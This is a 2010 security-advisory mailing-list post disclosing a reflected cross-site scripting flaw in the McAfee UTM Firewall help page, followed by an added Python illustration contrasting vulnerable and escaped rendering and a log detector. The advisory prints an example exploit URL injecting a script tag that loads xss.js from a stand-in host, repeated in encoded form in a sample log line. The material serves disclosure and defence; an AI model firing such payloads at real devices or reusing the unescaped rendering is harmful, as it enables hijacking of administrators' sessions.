Date: Wed, 09 Jun 2010 13:26:34 -0700
From: Adam Baldwin <adam_baldwin@...nuity-is.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: McAfee UTM Firewall Help Reflected Cross-Site Scripting

Advisory Information

Advisory ID: NGENUITY-2010-005
Date published: 6/9/2010

Vulnerability Information

Class: Reflected Cross-Site Scripting (XSS)

Software Description

McAfee UTM Firewall (Firmware 3.0.0 to 4.0.6) (formerly SnapGear) is the affected product line. More information can be found at https://kc.mcafee.com/corporate/index?page=content&id=SB10010 <http://www.mcafee.com/us/enterprise/products/network_security/utm_firewall.html>

Vulnerability Description

The help feature of the McAfee UTM Firewall (Firmware 3.0.0 to 4.0.6) management console is vulnerable to reflected cross-site scripting. It could allow an attacker to cause a user to execute attacker-supplied JavaScript code. This attack requires the target to have an existing valid session logged into the UTM device and that the attacker know the internal IP address of the UTM device.

McAfee recommends upgrading to UTM Firewall Firmware 4.0.7 to mitigate this vulnerability.

*Timeline: *
1/21/2010 - McAfee notified of vulnerability, provided with proof of concept
6/9/2010 - McAfee notified nGenuity of available fix and related information

Technical Description

*Example Exploit URL: *
hxxp://192.168.0.1/cgi-bin/cgix/help?&page=web_list_block"><script src="http://example.com/xss.js"></script>

Original Posting: http://ngenuity-is.com/advisories/2010/jun/9/mcafee-utm-firewall-help-cross-site-scripting/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
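As an added example (not code from the advisory, nGenuity or McAfee), the following models the bug class the advisory describes, a reflected query parameter landing unescaped inside an HTML attribute, next to the attribute-escaped rendering that closes it, and a check over constructed access-log lines that flags help requests whose page parameter carries markup. The render functions, HELP_PATH and the sample log lines are assumptions, not the device's actual code or logs.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical model of the bug class in the advisory: the "page" query
# parameter is reflected into an HTML attribute of the help page. This is not
# the UTM Firewall's actual code; it only reproduces the attribute-context flaw.

def render_help_vulnerable(page: str) -> str:
    # Verbatim reflection: a value that ends the attribute with "> can append tags.
    return f'<input type="hidden" name="page" value="{page}">'

def render_help_fixed(page: str) -> str:
    # Attribute-context escaping: quote=True also turns " and ' into entities,
    # so the value can never close the attribute or open a new tag.
    return f'<input type="hidden" name="page" value="{html.escape(page, quote=True)}">'

# Detection side: flag access-log requests for the help CGI whose "page" value
# carries markup characters. parse_qs does the percent-decoding, so encoded
# and raw payloads are treated alike.
HELP_PATH = "/cgi-bin/cgix/help"          # assumed path, taken from the advisory URL
MARKUP = re.compile(r'[<>"\']')
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_help_requests(log_lines):
    hits = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path != HELP_PATH:
            continue
        values = parse_qs(url.query, keep_blank_values=True).get("page", [])
        if any(MARKUP.search(v) for v in values):
            hits.append(line)
    return hits

# Constructed sample log lines in Common Log Format (not from any real device).
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Jun/2010:13:26:34 -0700] "GET /cgi-bin/cgix/help?&page=web_list_block HTTP/1.1" 200 2048',
    '10.0.0.5 - - [09/Jun/2010:13:27:01 -0700] "GET /cgi-bin/cgix/help?&page=web_list_block%22%3E%3Cscript%20src=%22http://example.com/xss.js%22%3E%3C/script%3E HTTP/1.1" 200 2110',
    '10.0.0.5 - - [09/Jun/2010:13:27:20 -0700] "GET /cgi-bin/cgix/status HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line in suspicious_help_requests(SAMPLE_LOG):
        print("suspicious:", line)
```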